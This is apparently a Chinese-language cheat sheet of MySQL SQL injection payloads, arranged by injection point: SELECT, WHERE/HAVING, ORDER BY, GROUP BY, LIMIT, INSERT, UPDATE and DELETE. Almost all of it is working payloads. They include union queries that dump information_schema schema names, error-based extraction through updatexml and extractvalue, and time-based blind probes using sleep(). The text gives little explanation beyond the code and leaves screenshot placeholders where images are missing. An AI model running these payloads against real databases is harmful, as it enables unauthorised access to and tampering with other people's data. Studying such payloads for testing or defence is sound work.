总结一下MySQL的注入点。

SELECT注入

select expr

不带反引号

1
select (select group_concat(schema_name)from information_schema.schemata);#

带反引号包裹

1
select `schema_name`from`information_schema`.`schemata`;#

table_reference

子查询的结果集可以在外部查询中使用,赋予别名以引用。

不带反引号

1
select * from(select group_concat(schema_name) from information_schema.schemata)t;#

带反引号包裹

1
select * from`information_schema`.`schemata`where 1=0 union select group_concat(schema_name),1,1,1,1,1 from information_schema.schemata;#

where_condition

判断技巧:2-1判断数字型,1a'判断字符型。

WHERE

数字型

1
select * from table1 WHERE id=-1 union select 1,group_concat(schema_name) from information_schema.schemata;#

字符型

1
select * from table1 WHERE id='-1' union select 1,group_concat(schema_name) from information_schema.schemata;#

HAVING

数字型

1
select * from table1 HAVING id=-1 union select 1,group_concat(schema_name) from information_schema.schemata;#

字符型

1
select * from table1 HAVING id='-1' union select 1,group_concat(schema_name) from information_schema.schemata;#

After ORDER BY/GROUP BY

ORDER BY

测试注入点

1
select * from table1 order by if(1=1,sleep(1),1);
1
select * from table1 order by '1',if(1=1,sleep(1),1);

数字型

1
select * from table1 order by updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30)),0);

字符型

1
select * from table1 order by '1',updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30)),0);

基于rand()不适合数据过少

1
select * from table1 order by rand(ascii(mid((select database()),1,1))>96)

GROUP BY

测试注入点

1
select group_concat(id) from table1 group by "id",if(1=1,sleep(1),1);

报错注入

1
select group_concat(id) from table1 group by "id",updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30)),0);

After LIMIT

存在 order by 关键字

适用版本MySQL 5.0.0-5.6.6

1
select * from table1 limit 1 procedure analyse(extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e)));

INSERT注入

测试注入点

1
insert into table1 values(1,'1' and if(1=1,sleep(1),1));#

tbl_name

1
INSERT into table1 values(4 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,30),0x7e),1),'2');#values(4,"2");

value_list

1
insert into table1 values(4,'2' and extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e)));#

注入点tbl_name也是通过注释后面的原语句然后在value_list中写入报错函数,通过报错注入回显报错信息。

没有回显信息只能用延时盲注了。

1
insert into table1 values(1,'1' and if(ord(substr((select database()),1,1))=116,sleep(1),1));#

UPDATE注入

table_reference

报错注入

1
UPDATE table1 SET id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));# SET id=0 where id=0;

延时注入

1
UPDATE table1 SET id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);# SET id=0 where id=0;

assignment_list

报错注入

1
UPDATE table1 SET id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));#

延时注入

1
UPDATE table1 SET id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);#

where_condition

报错注入

1
UPDATE table1 SET id=0 where id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));#

延时注入

1
UPDATE table1 SET id=0 where id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);#

After order by

没研究明白,报错函数短表达式可以报错,带上from和where会跳过报错。

1
UPDATE table1 set id=1 where id=1 order by updatexml(1,concat(0x7e,substr((select database()),1,30)),0);

截图

1
UPDATE table1 set id=1 where id=1 order by updatexml(1, concat(0x7e,substr((select column_name from information_schema.columns where table_name='table1' limit 0,1),1,30)),1);

截图


After LIMIT

与SELECT的LIMIT注入类似。


DELETE注入

还没见过DELETE注入,大概率在where_condition

where_condition

报错注入

1
DELETE FROM table1 WHERE id=0 or extractvalue(1, concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,30),0x7e));#

延时注入

1
DELETE FROM table1 WHERE id=0 or if(ord(substr(database(),1,1))>95,sleep(1),1);#